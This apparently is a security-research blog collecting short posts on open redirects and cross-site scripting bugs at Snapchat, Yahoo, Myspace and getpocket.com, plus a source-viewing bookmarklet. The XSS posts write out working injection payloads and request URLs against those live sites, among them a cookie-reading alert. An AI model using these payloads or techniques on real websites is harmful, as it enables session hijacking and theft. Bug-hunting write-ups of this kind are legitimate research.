Add nullbyte to URL

Tested this in latest version of Chrome:

http://zulln.se/test
You get an 404

http://zulln.se/test%00
You search for the url on Google

Update, this just happens when you type the URL yourself, if you click on the link something else will happend.

Try it out here: http://jsbin.com/oZudEDEz/2/

Open Redirect at getpocket.com

image

image

The unusually thing in this case is that they DON’T use the location-header and instead some javascript. 

XSS and Open Redirect at Snapchat

Credit to @revskills for publishing this.

When you first go to the link the server sends out an location-header to the url in the get-variable named “next”. (open redirect)
The secound time this is not happening, guess it’s a cookiebased controll.

Burp: image

The get-variable “next” is also printed multiple times in plain.

https://support.snapchat.com/login?next="><script>alert(1)</script>

Now check line 63 and you will find this: <input type="hidden" name="next" value=""><script>alert(1)</script>">

Then we have this thing:

<script type="text/javascript">
skipLogin=('&skip_login=true')
document.write(
'<div class="login-p"><a class="skip-sign-in dark-gray-text" href="/login?next="[payload]' + skipLogin + '">Skip Sign In</a></div>'
)
</script>

We can insert anything except ; there.
The easiest payload is this:

Payload: "><script>alert(1)</script>
Request: https://support.snapchat.com/login?next="><script>alert(1)</script>

<script type="text/javascript"> skipLogin=('&skip_login=true') document.write( '<div class="login-p"><a class="skip-sign-in dark-gray-text" href="/login?next="><script>alert(1)</script>' + skipLogin + '">Skip Sign In</a></div>' ) </script>

What really happens here is the script will write it out and then execute it, so really it is kinda a DOM-XSS(even if normal XSS is probably possible if you try).

So, basically it is a DOM-XSS, an Open Redirect and a reflected XSS in the very same page.

XSS at Yahoo

This post is moved from another blog and therefore the date is wrong.

Yahoo posted a blogpost saying that they will start with a bug bounty-program a few days ago. Now when it was new and so on I thought it could be fun to check if I was able to find anything.

Got like an hour over and analyze a site in Yahoo’s size in that time is kinda impossible so I was only able to look for the easy one now.
No DOM-based and so on, we save that to another time.

Start searched after different input-forms at Yahoo by using Google and keywords like search. After tested out a few different with no result I found this:

Search-term: test"jukk
----------

"function () {
var keyword = "test\"jukk";
var adNum = 0;
var requestStartTime = 0;
var requestEndTime = 0;
var runCSA = function () {

Okey, they are escaping my doublequote.
Lets try to escape the escape?

Search-term: test\"jukk
----------

function () {
var keyword = "test\\"jukk";
var adNum = 0;
var requestStartTime = 0;
var requestEndTime = 0;
var runCSA = function () {

As you can se, we escaped the escape so it won’t escape.

Now, lets try to alert our cookies.

Search-term: \";alert(document.cookie)//
----------

function () {
var keyword = "\\";alert(document.cookie)//";
var adNum = 0;
var requestStartTime = 0;
var requestEndTime = 0;
var runCSA = function () {

image


It works!

Get “generated source”

This post is moved from another blog and therefore the date is wrong.

Here is an very simple bookmarklet I wrote to get the “generated source” of an site.

My plans for this in the future is to add syntax-highlighting and a “beautifier” to make the code readable.Feel free to make whatever you want from it.

var win = window.open();

var source = document.documentElement.outerHTML;
source = source.replace(/&/g, '&amp;').replace(/</g, '&lt;');

win.document.write('<pre>' + source + '</pre>');

win.document.close();

XSS at Myspace

This post is moved from another blog and therefore the date is wrong.

Going to Myspace and saw there new fancy search-function, ofcourse I had to try to do something from it.
Start with type test”jukk(where jukk is just something random that never exist in the code from start), using a simple bookmarklet it is easy as pie to see all the code generated through javascript.

<h3>
    <a href="/search/songs?q=test" jukk"="">
        <span>See more <i></i></span>
        <span>SONGS</span>
    </a>
</h3>

So they don’t escape a quote but insert a space after it(rare…).
An a-href tag is not that fun actually so let’s see if we can use > to escape that too.

<h3>
    <a href="/search/songs?q=test">jukk"&gt;
        <span>See more <i></i></span>
        <span>SONGS</span>
    </a>
</h3>

That was possible too, now just see if we can use < to open a new tag.
Using same string again.

<h3>
    <a href="/search/songs?q=test" <jukk"="">
        <span>See more <i></i></span>
        <span>SONGS</span>
    </a>
</h3>

Awesome!
Now it’s seems very easy to make an little fancy alert-box looking starring at us.
Let’s try with ”><script>alert(1)</script> and check if that works.

<h3>
    <a href="/search/videos?q="><script>alert(1)</script>"&gt;
        <span>See more <i></i></span>
        <span>VIDEOS</span>
    </a>
</h3>

fancyalert